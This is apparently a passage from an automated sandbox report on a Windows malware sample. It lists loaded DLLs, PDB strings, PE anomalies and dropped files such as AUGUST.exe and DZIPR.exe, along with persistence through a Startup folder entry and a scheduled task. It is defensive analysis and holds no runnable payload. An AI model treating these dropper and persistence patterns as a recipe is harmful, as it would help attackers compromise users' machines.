                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winmm.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: wlxpec.17.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: BIT3E06.tmp.19.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 0000000E.00000003.2720616296.000000000267B000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.15.dr, DZIPR.dll.14.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,14_2_00406D5D
                      Source: vqqcre.21.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: mdvbfllr.17.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.dll.14.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: DZIPR.dll.15.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: yigmovm.25.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: AUGUST.exe.11.drStatic PE information: real checksum: 0x33302 should be: 0x4a3c93
                      Source: DZIPR.exe.14.drStatic PE information: section name: .didata
                      Source: DZIPR.exe.15.drStatic PE information: section name: .didata
                      Source: mdvbfllr.17.drStatic PE information: section name: cmxvoc
                      Source: vqqcre.21.drStatic PE information: section name: cmxvoc
                      Source: yigmovm.25.drStatic PE information: section name: cmxvoc
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00411C20 push eax; ret 14_2_00411C4E
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA75401 push ecx; ret 15_2_6FA75414
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA751A1 push ecx; ret 15_2_6FA751B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C545401 push ecx; ret 16_2_6C545414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C5451A1 push ecx; ret 16_2_6C5451B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD15401 push ecx; ret 20_2_6FD15414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD151A1 push ecx; ret 20_2_6FD151B4
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AUGUST.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yigmovmJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\mdvbfllrJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vqqcreJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\mdvbfllrJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vqqcreJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yigmovmJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmpJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\MDVBFLLR
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VQQCRE
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YIGMOVM
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA6DE29 IsIconic,GetWindowPlacement,GetWindowRect,15_2_6FA6DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C53DE29 IsIconic,GetWindowPlacement,GetWindowRect,16_2_6C53DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0DE29 IsIconic,GetWindowPlacement,GetWindowRect,20_2_6FD0DE29
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
